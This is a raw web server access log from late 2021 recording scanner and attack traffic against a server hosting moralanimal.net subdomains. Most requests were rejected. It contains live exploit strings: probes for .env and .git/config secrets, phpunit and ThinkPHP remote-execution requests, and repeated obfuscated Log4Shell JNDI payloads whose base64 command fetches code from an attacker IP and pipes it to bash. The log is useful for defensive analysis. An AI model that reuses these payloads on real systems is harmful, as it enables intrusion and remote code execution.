(compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [28/Dec/2021:11:44:30 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 198.199.97.174] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Dec/2021:12:10:19 +0000] 444 - GET https 64.22.31.253 "/?q=%diamegnetism%&va=b&t=hc&ia=web" [Client 34.147.5.227] [Length 0] [Gzip -] "-" "-" [28/Dec/2021:13:33:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.180.143.138] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [28/Dec/2021:14:30:27 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Dec/2021:14:45:58 +0000] 400 - GET http localhost "/" [Client 61.219.11.151] [Length 154] [Gzip -] "-" "-" [28/Dec/2021:14:55:21 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [28/Dec/2021:14:55:21 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [28/Dec/2021:14:59:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.247.252] [Length 0] [Gzip -] "-" "-" [28/Dec/2021:15:31:32 +0000] 444 - GET https localhost "/" [Client 47.253.94.195] [Length 0] [Gzip -] "-" "-" [28/Dec/2021:15:31:32 +0000] 444 - OPTIONS https localhost "/" [Client 47.253.94.195] [Length 0] [Gzip -] "-" "-" [28/Dec/2021:15:31:32 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 47.253.94.195] [Length 0] [Gzip -] "-" "-" [28/Dec/2021:15:31:32 +0000] 400 - - http localhost "-" [Client 47.253.94.195] [Length 154] [Gzip -] "-" "-" [28/Dec/2021:15:31:38 +0000] 400 - - https localhost "-" [Client 47.253.94.195] [Length 0] [Gzip -] "-" "-" [28/Dec/2021:15:31:38 +0000] 400 - - http localhost "-" [Client 47.253.94.195] [Length 154] [Gzip -] "-" "-" [28/Dec/2021:15:31:38 +0000] 400 - - http localhost "-" [Client 47.253.94.195] [Length 154] [Gzip -] "-" "-" [28/Dec/2021:15:31:38 +0000] 400 - - http localhost "-" [Client 47.253.94.195] [Length 154] [Gzip -] "-" "-" [28/Dec/2021:15:31:38 +0000] 400 - - http localhost "-" [Client 47.253.94.195] [Length 154] [Gzip -] "-" "-" [28/Dec/2021:15:31:38 +0000] 400 - - http localhost "-" [Client 47.253.94.195] [Length 154] [Gzip -] "-" "-" [28/Dec/2021:15:31:38 +0000] 400 - - http localhost "-" [Client 47.253.94.195] [Length 154] [Gzip -] "-" "-" [28/Dec/2021:15:33:53 +0000] 444 - GET https 64.22.31.253 "/text4041640705633" [Client 47.253.94.195] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [28/Dec/2021:15:33:53 +0000] 400 - GET http 64.22.31.253 "/text4041640705633" [Client 47.253.94.195] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [28/Dec/2021:15:33:53 +0000] 444 - GET https 64.22.31.253 "/HNAP1" [Client 47.253.94.195] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [28/Dec/2021:15:33:54 +0000] 400 - GET http 64.22.31.253 "/HNAP1" [Client 47.253.94.195] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [28/Dec/2021:15:33:54 +0000] 444 - GET https localhost "/" [Client 47.253.94.195] [Length 0] [Gzip -] "-" "-" [28/Dec/2021:15:33:54 +0000] 400 - GET http localhost "/" [Client 47.253.94.195] [Length 252] [Gzip -] "-" "-" [28/Dec/2021:15:33:54 +0000] 444 - POST https 64.22.31.253 "/sdk" [Client 47.253.94.195] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [28/Dec/2021:15:33:54 +0000] 444 - GET https 64.22.31.253 "/evox/about" [Client 47.253.94.195] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [28/Dec/2021:15:33:54 +0000] 400 - POST http 64.22.31.253 "/sdk" [Client 47.253.94.195] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [28/Dec/2021:15:33:54 +0000] 400 - GET http 64.22.31.253 "/evox/about" [Client 47.253.94.195] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [28/Dec/2021:15:33:54 +0000] 444 - GET https 64.22.31.253 "/" [Client 47.253.94.195] [Length 0] [Gzip -] "-" "-" [28/Dec/2021:15:33:54 +0000] 400 - GET http 64.22.31.253 "/" [Client 47.253.94.195] [Length 252] [Gzip -] "-" "-" [28/Dec/2021:15:34:14 +0000] 444 - GET https 64.22.31.253 "/" [Client 47.253.94.195] [Length 0] [Gzip -] "-" "-" [28/Dec/2021:15:34:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 47.253.94.195] [Length 0] [Gzip -] "curl/7.75.0" "-" [28/Dec/2021:16:29:45 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Dec/2021:16:34:37 +0000] 444 - GET https agent.moralanimal.net "/" [Client 34.86.35.10] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [28/Dec/2021:17:14:51 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.195.93.98] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [28/Dec/2021:17:21:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.215.139] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Dec/2021:17:39:45 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Dec/2021:18:10:43 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.123] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [28/Dec/2021:18:36:38 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Dec/2021:19:47:57 +0000] 444 - GET https guacamole.moralanimal.net "/.git/config" [Client 23.154.177.6] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [28/Dec/2021:20:55:14 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Dec/2021:21:14:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.113] [Length 0] [Gzip -] "-" "-" [28/Dec/2021:21:14:33 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.113] [Length 252] [Gzip -] "-" "-" [28/Dec/2021:21:40:27 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.213.113] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Dec/2021:21:42:07 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 198.199.95.200] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Dec/2021:21:42:43 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.212.44] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Dec/2021:22:30:38 +0000] 400 - POST http localhost "-" [Client 195.54.160.149] [Length 154] [Gzip -] "-" "-" [28/Dec/2021:23:22:05 +0000] 444 - GET https 64.22.31.253 "/ReportServer" [Client 192.241.215.173] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Dec/2021:23:31:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Dec/2021:23:40:30 +0000] 444 - GET https 64.22.31.253 "/login" [Client 198.199.100.17] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Dec/2021:00:00:56 +0000] 444 - GET https 64.22.31.253 "/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [Client 195.54.160.149] [Length 0] [Gzip -] "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [29/Dec/2021:00:03:10 +0000] 400 - GET http 64.22.31.253 "/.git/config" [Client 109.237.103.118] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [29/Dec/2021:00:03:11 +0000] 444 - GET https 64.22.31.253 "/.git/config" [Client 109.237.103.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [29/Dec/2021:01:08:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.90.160.114] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [29/Dec/2021:01:40:09 +0000] 444 - GET https 64.22.31.253 "/api/productConfig" [Client 185.162.235.164] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" "-" [29/Dec/2021:02:09:51 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 193.56.29.120] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" "-" [29/Dec/2021:02:09:52 +0000] 444 - POST https 64.22.31.253 "/" [Client 193.56.29.120] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" "-" [29/Dec/2021:02:31:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 65.49.20.69] [Length 0] [Gzip -] "-" "-" [29/Dec/2021:03:55:26 +0000] 400 - GET http localhost "/" [Client 161.35.188.242] [Length 154] [Gzip -] "-" "-" [29/Dec/2021:03:55:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 161.35.188.242] [Length 0] [Gzip -] "l9tcpid/v1.1.0" "-" [29/Dec/2021:05:03:38 +0000] 400 - GET http localhost "/" [Client 167.99.133.28] [Length 154] [Gzip -] "-" "-" [29/Dec/2021:05:04:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.99.133.28] [Length 0] [Gzip -] "l9tcpid/v1.1.0" "-" [29/Dec/2021:05:37:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [29/Dec/2021:08:35:29 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.212.233] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Dec/2021:08:44:38 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.204.56] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Dec/2021:08:47:33 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Dec/2021:08:47:34 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Dec/2021:09:04:35 +0000] 444 - GET https 139.162.113.11 "/" [Client 178.62.126.73] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 OPR/56.0.3051.116" "-" [29/Dec/2021:10:17:07 +0000] 444 - HEAD https 64.22.31.253 "/cgi-bin/welcome" [Client 193.56.29.105] [Length 0] [Gzip -] "curl/7.80.0" "-" [29/Dec/2021:11:16:07 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Dec/2021:12:00:25 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.214.52] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Dec/2021:12:51:18 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Dec/2021:13:13:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [29/Dec/2021:13:44:38 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Dec/2021:14:36:06 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [29/Dec/2021:14:43:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 137.220.228.75] [Length 0] [Gzip -] "-" "-" [29/Dec/2021:14:43:29 +0000] 400 - - http localhost "-" [Client 137.220.228.75] [Length 154] [Gzip -] "-" "-" [29/Dec/2021:14:43:31 +0000] 400 - - http localhost "-" [Client 137.220.228.75] [Length 154] [Gzip -] "-" "-" [29/Dec/2021:14:43:32 +0000] 400 - - http localhost "-" [Client 137.220.228.75] [Length 154] [Gzip -] "-" "-" [29/Dec/2021:14:43:44 +0000] 400 - - https localhost "-" [Client 137.220.228.75] [Length 0] [Gzip -] "-" "-" [29/Dec/2021:14:44:07 +0000] 444 - GET https 64.22.31.253 "/favicon.ico" [Client 137.220.228.75] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [29/Dec/2021:14:44:14 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 137.220.228.75] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [29/Dec/2021:14:44:19 +0000] 444 - GET https 64.22.31.253 "/sitemap.xml" [Client 137.220.228.75] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [29/Dec/2021:15:37:03 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Dec/2021:15:41:34 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [29/Dec/2021:15:41:34 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [29/Dec/2021:17:04:30 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Dec/2021:17:26:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.208.29] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Dec/2021:17:56:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.140.248.32] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [29/Dec/2021:18:13:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Dec/2021:19:07:54 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Dec/2021:19:51:44 +0000] 400 - POST http localhost "-" [Client 195.54.160.149] [Length 154] [Gzip -] "-" "-" [29/Dec/2021:20:53:20 +0000] 444 - GET https 64.22.31.253 "/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [Client 195.54.160.149] [Length 0] [Gzip -] "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [29/Dec/2021:21:12:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.59] [Length 0] [Gzip -] "-" "-" [29/Dec/2021:21:12:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.44] [Length 0] [Gzip -] "-" "-" [29/Dec/2021:21:12:01 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.59] [Length 252] [Gzip -] "-" "-" [29/Dec/2021:21:12:02 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.44] [Length 252] [Gzip -] "-" "-" [29/Dec/2021:21:24:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.236.147.154] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [29/Dec/2021:21:24:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.236.147.154] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [29/Dec/2021:21:24:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.236.147.154] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [29/Dec/2021:21:25:20 +0000] 400 - - https localhost "-" [Client 23.236.147.154] [Length 0] [Gzip -] "-" "-" [29/Dec/2021:21:25:22 +0000] 400 - - https localhost "-" [Client 23.236.147.154] [Length 0] [Gzip -] "-" "-" [29/Dec/2021:21:25:24 +0000] 400 - - https localhost "-" [Client 23.236.147.154] [Length 0] [Gzip -] "-" "-" [29/Dec/2021:21:25:39 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 23.236.147.154] [Length 0] [Gzip -] "-" "-" [29/Dec/2021:21:25:39 +0000] 444 - GET https 64.22.31.253 "/sitemap.xml" [Client 23.236.147.154] [Length 0] [Gzip -] "-" "-" [29/Dec/2021:21:25:40 +0000] 444 - GET https 64.22.31.253 "/.well-known/security.txt" [Client 23.236.147.154] [Length 0] [Gzip -] "-" "-" [29/Dec/2021:21:25:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.140.248.32] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [29/Dec/2021:21:45:43 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.213.120] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Dec/2021:21:46:22 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.208.61] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Dec/2021:21:47:24 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.211.160] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Dec/2021:21:51:02 +0000] 400 - - http localhost "-" [Client 45.143.200.118] [Length 154] [Gzip -] "-" "-" [29/Dec/2021:21:58:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.251.102.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [29/Dec/2021:22:11:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 213.32.122.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [29/Dec/2021:22:11:41 +0000] 400 - GET http 64.22.31.253 "/" [Client 213.32.122.82] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [29/Dec/2021:22:49:29 +0000] 400 - - http localhost "-" [Client 88.80.191.6] [Length 154] [Gzip -] "-" "-" [30/Dec/2021:00:31:06 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 45.144.225.92] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" "-" [30/Dec/2021:01:03:07 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [30/Dec/2021:03:35:20 +0000] 400 - - http localhost "-" [Client 172.104.131.24] [Length 154] [Gzip -] "-" "-" [30/Dec/2021:04:00:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 60.217.75.69] [Length 0] [Gzip -] "Mozilla/5.0" "-" [30/Dec/2021:04:04:51 +0000] 444 - OPTIONS https 64.22.31.253 "/" [Client 156.146.50.181] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36" "-" [30/Dec/2021:05:09:18 +0000] 400 - - http localhost "-" [Client 61.219.11.151] [Length 154] [Gzip -] "-" "-" [30/Dec/2021:06:33:25 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Dec/2021:06:33:25 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Dec/2021:06:43:22 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Dec/2021:06:43:22 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Dec/2021:06:58:08 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Dec/2021:06:58:09 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Dec/2021:07:01:43 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Dec/2021:07:01:43 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Dec/2021:07:10:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [30/Dec/2021:07:33:30 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [30/Dec/2021:07:33:31 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [30/Dec/2021:07:51:25 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Dec/2021:07:51:25 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; 